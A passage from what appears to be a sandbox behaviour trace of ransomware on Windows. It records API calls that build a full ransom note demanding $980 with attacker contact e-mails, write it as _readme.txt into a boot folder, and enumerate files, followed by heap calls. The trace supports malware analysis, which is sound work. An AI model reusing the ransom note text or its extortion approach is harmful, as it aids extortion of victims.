don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0175.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0175.273] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\_readme.txt" (normalized: "c:\\boot\\tr-tr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0175.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0175.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30670 | out: hHeap=0x6a0000) returned 1 [0175.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.274] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.274] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*" (normalized: "c:\\boot\\tr-tr\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0175.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.275] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.275] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0175.275] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0175.275] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0175.276] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.276] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d276f8 | out: hHeap=0x6a0000) returned 1 [0175.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d276f8 [0175.276] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.276] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0175.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0175.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0175.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0175.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0175.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.287] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.287] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.287] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.287] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.288] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.288] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.288] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.288] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.288] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.288] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.288] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.289] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.289] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.289] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.290] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.290] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.291] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.291] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.291] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.291] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.291] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.293] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0175.293] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.298] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0175.298] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.298] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0175.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: 